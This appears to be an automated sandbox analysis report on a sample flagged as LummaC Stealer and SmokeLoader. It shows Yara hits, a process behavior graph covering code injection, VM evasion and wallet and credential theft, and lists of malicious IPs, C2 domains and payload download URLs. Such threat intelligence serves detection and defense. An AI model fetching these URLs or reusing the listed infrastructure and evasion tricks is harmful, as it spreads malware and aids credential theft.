Source: Yara match File source: 10.0.7C81.exe.7ff7d4c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7C81.exe.7ff7d4c00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7C81.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\7C81.exe, type: DROPPED
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483386 Sample: file.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 69 rentry.co 2->69 71 mzxn.ru 2->71 73 6 other IPs or domains 2->73 85 Multi AV Scanner detection for domain / URL 2->85 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 93 14 other signatures 2->93 10 file.exe 2->10         started        13 sashibt 2->13         started        15 sashibt 2->15         started        signatures3 91 Connects to a pastebin service (likely for C&C) 69->91 process4 signatures5 127 Detected unpacking (changes PE section rights) 10->127 129 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->129 131 Maps a DLL or memory area into another process 10->131 133 Switches to a custom stack to bypass stack traces 10->133 17 explorer.exe 113 10 10->17 injected 135 Antivirus detection for dropped file 13->135 137 Multi AV Scanner detection for dropped file 13->137 139 Machine Learning detection for dropped file 13->139 141 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->141 143 Checks if the current machine is a virtual machine (disk enumeration) 15->143 145 Creates a thread in another existing process (thread injection) 15->145 process6 dnsIp7 59 mussangroup.com 185.149.100.242, 443, 51812 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 17->59 61 mzxn.ru 186.145.236.93, 49709, 49710, 49711 TelmexColombiaSACO Colombia 17->61 63 9 other IPs or domains 17->63 49 C:\Users\user\AppData\Roaming\sashibt, PE32 17->49 dropped 51 C:\Users\user\AppData\Local\Temp\7C81.exe, PE32+ 17->51 dropped 53 C:\Users\user\AppData\Local\Temp\6E8A.exe, PE32+ 17->53 dropped 55 2 other malicious files 17->55 dropped 95 System process connects to network (likely due to code injection or exploit) 17->95 97 Benign windows process drops PE files 17->97 99 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 17->99 101 5 other signatures 17->101 22 7C81.exe 2 17->22         started        25 6E8A.exe 14 6 17->25         started        29 3530.exe 1 17->29         started        31 2 other processes 17->31 file8 signatures9 process10 dnsIp11 103 Multi AV Scanner detection for dropped file 22->103 105 Writes to foreign memory regions 22->105 107 Allocates memory in foreign processes 22->107 123 2 other signatures 22->123 33 BitLockerToGo.exe 22->33         started        75 rentry.co 104.26.3.16, 443, 51837 CLOUDFLARENETUS United States 25->75 57 C:\Users\user\AppData\...\rentry-script.ps1, ASCII 25->57 dropped 109 Suspicious powershell command line found 25->109 111 Found many strings related to Crypto-Wallets (likely being stolen) 25->111 113 Bypasses PowerShell execution policy 25->113 125 3 other signatures 25->125 37 powershell.exe 25->37         started        39 6E8A.exe 25->39         started        115 Check for Windows Defender sandbox 29->115 117 Machine Learning detection for dropped file 29->117 119 Changes memory attributes in foreign processes to executable or writable 29->119 121 Injects code into the Windows Explorer (explorer.exe) 29->121 41 conhost.exe 29->41         started        43 conhost.exe 31->43         started        45 conhost.exe 31->45         started        file12 signatures13 process14 dnsIp15 65 callosallsaospz.shop 188.114.96.3, 443, 51828, 51832 CLOUDFLARENETUS European Union 33->65 77 Query firmware table information (likely to detect VMs) 33->77 79 Found many strings related to Crypto-Wallets (likely being stolen) 33->79 81 Tries to harvest and steal ftp login credentials 33->81 83 2 other signatures 33->83 67 store4.gofile.io 31.14.70.245, 443, 51842, 51850 LINKER-ASFR Virgin Islands (BRITISH) 37->67 47 conhost.exe 37->47         started        signatures16 process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.221.157.163
 unknown Russian Federation
30968 INFOBOX-ASInfoboxruAutonomousSystemRU true
107.173.160.139
 unknown United States
36352 AS-COLOCROSSINGUS true
107.173.160.137
 unknown United States
36352 AS-COLOCROSSINGUS true
162.0.235.84
 funrecipebooks.com Canada
22612 NAMECHEAP-NETUS true
109.172.114.212
 unknown Russian Federation
41691 SUMTEL-AS-RIPEMoscowRussiaRU true
64.190.113.113
 unknown United States
26646 TRAVELCLICKCORP1US true
125.7.253.10
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR true
177.222.41.236
 unknown Bolivia
27882 TelefonicaCelulardeBoliviaSABO true
186.145.236.93
 mzxn.ru Colombia
14080 TelmexColombiaSACO true
104.26.3.16
 rentry.co United States
13335 CLOUDFLARENETUS true
167.235.128.153
 unknown United States
3525 ALBERTSONSUS true
188.114.96.3
 callosallsaospz.shop European Union
13335 CLOUDFLARENETUS true
185.149.100.242
 mussangroup.com Turkey
209853 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi true
31.14.70.245
 store4.gofile.io Virgin Islands (BRITISH)
199483 LINKER-ASFR false

Contacted Domains

Name IP Active
funrecipebooks.com 162.0.235.84 true
store4.gofile.io 31.14.70.245 true
rentry.co 104.26.3.16 true
mzxn.ru 186.145.236.93 true
liernessfornicsa.shop 172.67.213.85 true
mussangroup.com 185.149.100.242 true
callosallsaospz.shop 188.114.96.3 true
206.23.85.13.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://callosallsaospz.shop/api false
  • 22%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://100xmargin.com/tmp/index.php true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://olinsw.ws/tmp/index.php true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://wgdnb4rc.xyz/tmp/index.php true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://107.173.160.137/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://rentry.co/microgods/raw false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://mzxn.ru/tmp/index.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
lariatedzugspd.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
callosallsaospz.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://167.235.128.153/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://funrecipebooks.com/setups.exe true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
liernessfornicsa.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://107.173.160.139/ true
  • Avira URL Cloud: safe
 unknown
shepherdlyopzc.shop true
  • Avira URL Cloud: safe
 unknown
upknittsoappz.shop true
  • Avira URL Cloud: safe
 unknown
https://mussangroup.com/wp-content/images/pic1.jpg true
  • Avira URL Cloud: malware
 unknown
outpointsozp.shop true
  • Avira URL Cloud: safe
 unknown
https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip false
  • Avira URL Cloud: safe
 unknown
unseaffarignsk.shop true
  • Avira URL Cloud: safe
 unknown